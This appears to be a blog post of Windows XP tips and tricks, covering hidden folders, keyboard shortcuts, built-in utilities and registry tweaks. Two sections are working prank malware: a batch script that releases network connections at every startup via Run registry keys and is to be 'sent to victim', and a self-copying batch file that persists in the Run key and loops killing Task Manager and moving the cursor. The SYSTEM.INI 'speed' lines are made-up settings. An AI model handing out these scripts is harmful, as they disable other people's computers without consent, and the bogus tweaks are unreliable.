• Start>Run Type cmd
• In command prompt change directory to the root folder of the folder you wanna hide.
eg: if folder to hide is 'secret' in : D:\hhh\ggg\secret. Change prompt to d:\hhh\ggg using cd command.
• Now type "attrib folder name +s +h" with out quotes. Here the folder name is "secret".
• Done!! Now go to folder options and show hidden files. The folder wont be
• shown!!!
• Now to see it your need to uncheck hide system files in folder options.
• To reverse back changes type "attrib folder name -s -h" in command prompt.
Note:
The attrib +s changes the attribute of the file to system file.
And +h changes it to hidden.
________________________________________
MAKE A FILE/FOLDER NOT ACCESSABLE
• Goto safe mode and right click on the file and select properties.
• The go to the tab named security
• change the all the accessibility option to deny, for all users
• Now the file won't be accessible unless the reverse is performed.
________________________________________
USE YOUR WINDOWS KEY
The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don''t ignore it. It is the shortcut anchor for the following commands:
• Windows: Display the Start menu
• Windows + D: Minimize or restore all windows
• Windows + E: Display Windows Explorer
• Windows + F: Display Search for files
• Windows + Ctrl + F: Display Search for computer
• Windows + F1: Display Help and Support Center
• Windows + R: Display Run dialog box
• Windows + break: Display System Properties dialog box
• Windows + shift + M: Undo minimize all windows
• Windows + L: Lock the workstation
• Windows + U: Open Utility Manager
• Windows + Q: Quick switching of users (Powertoys only)
• Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your pc
________________________________________
WINDOWS XP HIDDEN APPS
To run any of these apps go to Start > Run and type the executable name (ie charmap).
WINDOWS XP HIDDEN APPS:
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you
everything you ever wanted to know about any aspect of PC performance,
for uber-geeks
only )
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders
on network).
17) File siganture verification tool = sigverif.exe
18) Volume Contro = sndvol32.exe (I've included this for those people
that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just
like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care,
it's virtually undocumented but it appears to encrypt all passwords,
I'm not sure of the full implications).
21) Microsoft Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the
actions of drivers, might be useful for people having driver problems.
Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility
to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc used to manage group policies, and permissions
FAST SHUT DOWN TRICK
Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ‘ Ctrl ‘ key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.
START MENU
===========
RUN
TYPE “SYSTEM.INI”
AND IN THE END
PUT THE FOLLWING
page buffer=100000kbps
load=100000kbps
Download=100000kbps
save=100000kbps
back=100000kbps
Learn Something Good
You Should Always Ready 4 Help Ny Person
Make a Without Name & Hidden Folder
Without Name Folder
Make con folder
make new folder ny where
=rename it
=press alt+255(frm num pad)
=nw type con
After That
Right Click on Folder >> Customize Folder >> Change Icon >> Select Hidden Icon
Disable Internet Permanantly
Open Notepad & Type
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save as DisableInet.bat
Send to Victim
Disabling Batch File
@echo OFF
MODE CON COLS=14 LINES=2
TITLE ^>:^^(
COLOR F7
COPY %0 C:\WINDOWS\d.bat>NUL
ECHO Windows Registry Editor Version 5.00>C:\d.reg
ECHO.>>C:\d.reg
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>C:\d.reg
ECHO "CursorBastardizer"="C:\\WINDOWS\\d.bat">>C:\d.reg
REGEDIT /s C:\d.reg
DEL /f /q C:\d.reg
:D
RUNDLL32 user32.dll,mouse_event
RUNDLL32 user32.dll,SetCursorPos
TSkill taskmgr
RUNDLL32 user32.dll,SetCursorPos
RUNDLL32 user32.dll,mouse_event
TASKKill /F /im taskmgr.exe
RUNDLL32 user32.dll,SetCursorPos
GOTO D
PC MORE FASTER MORE THAN BEFORE
====================
HKEY_CURRENT_USER\Control Panel\Desktop
then select
MenuShowDelay
change 400 to
MAKE APPLICATION OPEN MORE POWER
========================================
HKEY_CLASSES_ROOT\exefile
then right click on shell and make new key and putit name is
high priority
and then click on high priority and make new key and put it name is
command
and in the other side modify the value to
c:\WINDOWS\System32\cmd.exe /c start “runhigh” /high “%1
Decrease boot time
Create a batch file by doing the following:
1) Open notepad and enter the following lines:
RD /S /q "C:\Documents and Settings\"UserName without quotes"\Local Settings\History"
RD /S /q "C:\Documents and Settings\Default User\Local Settings\History"
RD /S /q "D:\Temp\" <--"Deletes temp folder, type in the location of your temp folder"
2) Save the fily and then rename is something like deltemp.bat
3) Now click Start, Run and type in gpedit.msc --->Computer Configuration --->Windows Settings --->Scripts and double click on Shutdown --->Click Add and find the batch file you created and press ok to set the script .
HOW TO GIVE A BLANK NAME FOR THE FOLDER????try dis
1.CREATE A NEW FOLDER.
2.RIGHT CLICK N CLICK ON RENAME.
3. NOW keep pressed Alt key and type 0160.....release the Alt key and hit ENTER.....
""
"U CAN HIDE DIS BLANK NAMED FOLDER BY CUSTOMIZING IT"
for that
right click on that blank named folder......
go to properties and click on customize......
than click on change icon.....
select any blank icon (der will b a space left between two icons select that)......
and click on ok.......
than apply it n click ok............
Make a folder Unreadable
1) First Create a folder with any name
2)Inside it create a file called "desktop.ini"
with the following contents
[.ShellClassInfo]
CLSID={00021401-0000-0000-c000-000000000046}
3)Then come out of the folder and make a batch file, for this
a)create a new text file
b)type "attrib +h +s +r
for example if ur folder name is HAI then the command should be
attrib +h +s +r HAI
4)This will turn ur folder to an unreadable file..
5)if u want to access the folder edit the batch file and change all + to -..i.e
attrib -h -s -r
this will bring back the folder..
No comments:
Post a Comment